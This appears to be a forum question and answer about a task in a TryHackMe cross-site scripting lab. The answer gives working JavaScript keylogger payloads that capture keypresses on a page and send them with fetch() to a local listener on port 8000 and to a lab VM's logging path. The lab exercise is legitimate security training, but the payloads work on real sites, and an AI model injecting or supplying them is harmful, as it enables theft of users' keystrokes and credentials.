I'm doing the xss challenge on tryhackme.com (https://tryhackme.com/room/xss). The 7th task asks me to use a simple keylogger
<script type="text/javascript">
let l = "";
document.onkeypress = function (e) {
l += e.key;
console.log(l);
}
</script>
and send the input to http://<vm ip>/log/<this data will be logged>
as that will log the keystrokes which can be viewed by going to http://<vm ip>/logs
. I have tried things such as window.location
, but can't get it to work.
For further learning, I'd also like to send the data to my SimpleHTTPServer
running on port 8000
, so that the keys would be displayed in my terminal as they are typed on the webpage. I cannot get this to work.
Could someone please show me how to do this?
No, I am not being malicious. I am learning as I'd like to work in cyber security. If I was being malicious I'd just use scripts I'd find on GitHub or something without understanding how they work.
Thank you.
As SimpleHTTPServer logs every request it receives, you can use fetch() to make a GET request and pass the data within it.
<script type="text/javascript">
let l = "";
document.onkeypress = function (e) {
l += e.key;
console.log(l);
fetch(`http://127.0.0.1:8000?logger=${l}`, { mode: 'no-cors'});
}
</script>
This would give you something like this:
For sending the data to the VM you could use fetch too, being it something like this:
fetch(`http://VM_IP/log/${l}`, { mode: 'no-cors'});